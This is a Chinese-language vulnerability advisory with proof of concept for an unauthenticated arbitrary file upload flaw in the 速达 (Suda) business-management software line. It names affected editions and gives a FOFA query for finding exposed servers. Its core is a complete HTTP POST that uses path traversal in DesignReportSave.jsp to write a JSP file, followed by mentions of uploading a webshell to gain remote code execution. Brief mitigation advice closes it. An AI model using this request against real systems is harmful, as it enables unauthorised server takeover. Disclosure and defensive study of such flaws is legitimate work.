0x01 产品简介

  速达软件是中小企业管理软件第一品牌和行业领导者,是128万家企业用户忠实的选择。14年来速达致力于进销存软件、ERP软件、财务软件、CRM软件等管理软件的研发和服务。

0x02 漏洞概述

  速达软件全系产品存在任意文件上传漏洞，未经身份认证得攻击者可以通过此漏洞上传恶意后门文件，执行任意指令，造成服务器失陷

0x03 影响范围

速达A3.cloud BAS
速达A3.cloud STD
速达A30.cloud PRO
速达3000.online PRO
速达A4.cloud BAS
速达A4.cloud STD
速达A40.cloud PRO
速达4000.online PRO
速达A5.cloud STD
速达A50.cloud PRO
速达A70.cloud PRO
速达5000.online PRO
速达7000.online PRO

0x04 复现环境

FOFA：app="速达软件-公司产品"

0x05 漏洞复现 

PoC

POST /report/DesignReportSave.jsp?report=../文件名 HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Type: application/octet-stream
Connection: close

<% out.print("test");%>

验证

上传马子

RCE

0x06 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本